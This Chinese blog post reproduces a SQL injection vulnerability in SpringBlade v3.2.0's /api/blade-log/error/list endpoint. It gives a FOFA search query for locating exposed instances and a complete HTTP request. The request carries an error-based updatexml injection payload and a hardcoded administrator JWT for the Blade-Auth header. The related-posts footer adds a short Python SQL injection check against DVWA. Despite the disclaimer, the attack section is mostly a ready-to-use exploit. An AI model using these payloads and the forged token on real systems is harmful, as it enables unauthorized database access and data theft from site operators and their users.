【漏洞复现】SpringBlade error_list SQL 注入漏洞

已于 2024-03-26 10:50:24 修改
阅读量470 收藏 9
点赞数 6
分类专栏: 漏洞复现 文章标签: web安全
于 2024-03-26 10:48:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40550150/article/details/137039243
版权

免责声明:文章来源互联网收集整理,文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

一、漏洞简介

​SpringBlade 是一个由商业级项目升级优化而来的 SpringCloud 分布式微服务架构、SpringBoot 单体式微服务架构并存的综合型项目。框架后台/api/blade-log/error/list路径存在安全漏洞,攻击者利用该漏洞进行SQL注入攻击。

二、影响版本

  • SpringBlade v3.2.0

三、资产测绘

  • fofa:body="[https://bladex.vip"](https://bladex.vip")

image.png

四、漏洞复现

GET /api/blade-log/error/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0
Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ

image.png

E_cho234
关注
  • 6
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
spring框架漏洞整理(Spring Framework漏洞)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-01 1432
spring框架漏洞整理之Spring Framework漏洞(CVE-2015-5211)Spring Framework 内容协商机制(content-negotiation)反射型文件下载(RFD)。 RFD,即 Reflected File Download 反射型文件下载漏洞,是一个 2014 年来自 BlackHat 的漏洞。这个漏洞在原理上类似 XSS,在危害上类似 DDE:攻击者可以通过一个 URL 地址使用户下载一个恶意文件,从而危害用户的终端 PC。 这个漏洞很罕见,大多数公司会认为它是
net_error_list.h
10-15
chrome cef net_error_list
SpringBlade dict-biz/list SQL 注入漏洞复现
0xSec
04-16 1245
SpringBlade 后台框架/api/blade-system/dict-biz/list 路径存在SQL注入漏洞,攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
漏洞复现SpringBlade dict-biz SQL注入漏洞
最新发布
qq_67810151的博客
04-22 391
SpringBlade dict-biz接口存在SQL注入漏洞。未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。
复现SpringBlade SQL 注入漏洞_22
fushuang333的博客
01-18 2214
复现SpringBlade SQL 注入漏洞SpringBlade 是由一个商业级项目升级优化而来的SpringCloud微服务架构,采用Java8 API重构了业务代码,完全遵循阿里巴巴编码规范。
漏洞复现SpringBlade error/list SQL 注入漏洞
weixin_52204925的博客
03-13 1633
SpringBlade 框架后台 /api/blade-log/error/list路径存在SQL注入漏洞,攻击者可以利用 SQL 注入漏洞获取数据库中的信息(管理员后台密码、站点的用户个人信息),还可以在拥有高权限的情况下向服务器写入木马文件,造成服务器失陷。
漏洞复现】(1day)Bladex快速开发平台sql注入漏洞
weixin_56297026的博客
12-20 1024
fofa语法:body="https://bladex.vip/"
SpringBlade-权限缺陷】API鉴权逻辑缺陷漏洞
06-29 6849
【API鉴权】
SpringBlade error/list SQL 注入漏洞复现
0xSec
03-12 900
SpringBlade 框架后台 /api/blade-log/error/list路径存在SQL注入漏洞,攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
PHP set_error_handler()函数使用详解(示例)
10-26
string set_error_handler ( callback error_handler [, int error_types] ) ``` 参数 `error_handler` 是一个回调函数,当 PHP 遇到错误时,会调用这个函数。`error_types` 是可选参数,用于指定希望处理的错误...
error_prone_annotations-2.2.0-API文档-中文版.zip
06-05
赠送jar包:error_prone_annotations-2.2.0.jar; 赠送原API文档:error_prone_annotations-2.2.0-javadoc.jar; 赠送源代码:error_prone_annotations-2.2.0-sources.jar; 赠送Maven依赖信息文件:error_prone_...
error_prone_annotations-2.10.0-API文档-中英对照版.zip
05-04
赠送jar包:error_prone_annotations-2.10.0.jar; 赠送原API文档:error_prone_annotations-2.10.0-javadoc.jar; 赠送源代码:error_prone_annotations-2.10.0-sources.jar; 赠送Maven依赖信息文件:error_prone_...
LeNet_error_rate_testing_cnn故障_cnn故障注入_
10-02
测试cnn每层故障敏感度
转载:SpringBlade框架JWT认证缺陷漏洞CVE-2021-44910
HRay's blog
01-29 7012
SpringBlade框架JWT认证缺陷漏洞CVE-2021-44910
Blade-X日志接口未授权访问
spkiddai
07-30 2448
CNVD-2022-44335 blade-x未授权访问
解决BladeX微服务Swagger资源未授权访问漏洞
qq_38127559的博客
03-26 1380
客户线上环境,第三方进行安全检测时候,反馈来一个"Spring"接口未授权访问漏洞
漏洞复现SpringBlade export-user接口SQL注入漏洞
做自己喜欢的事,并将其发挥到极致!
01-22 1159
SpringBlade 是一个由商业级项目升级优化而来的微服务架构 采用Spring Boot 2.7 、Spring Cloud 2021 等核心技术构建,完全遵循阿里巴巴编码规范。提供基于React和Vue的两个前端框架用于快速搭建企业级的SaaS多租户微服务平台。
SpringBlade export-user SQL 注入漏洞复现
0xSec
12-19 1603
SpringBlade v3.2.0 及之前版本框架后台 export-user 路径存在安全漏洞,攻击者利用该漏洞可通过组件customSqlSegment 进行SQL注入攻击,攻击者可将用户名、密码等敏感信息通过 excel 导出。
编写一个能够验证dvwasql注入漏洞的poc
07-13
我可以帮你提供一个简单的示例代码来验证 DVWA(Damn Vulnerable Web Application)中的 SQL 注入漏洞。请注意,这个示例仅用于教育目的,不要在未经授权的情况下使用它。 ``` import requests def check_sql_injection_vulnerability(url): payload = "' OR '1'='1' -- " response = requests.get(url + "?id=" + payload) if "Error" in response.text: print("该网站存在 SQL 注入漏洞!") else: print("该网站不存在 SQL 注入漏洞。") # 在这里替换为你的 DVWA 网站的 URL dvwa_url = "http://example.com/dvwa/vulnerabilities/sqli/" check_sql_injection_vulnerability(dvwa_url) ``` 请确保替换 `dvwa_url` 变量为你自己的 DVWA 网站的 URL,然后运行代码。如果输出显示该网站存在 SQL 注入漏洞,则说明你的 DVWA 配置存在问题,需要进行修复。 请记住,这只是一个简单的示例,实际的 SQL 注入漏洞检测可能需要更复杂的测试方法和技术。在进行任何安全测试之前,请确保遵守法律和道德准则,并获得适当的授权。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值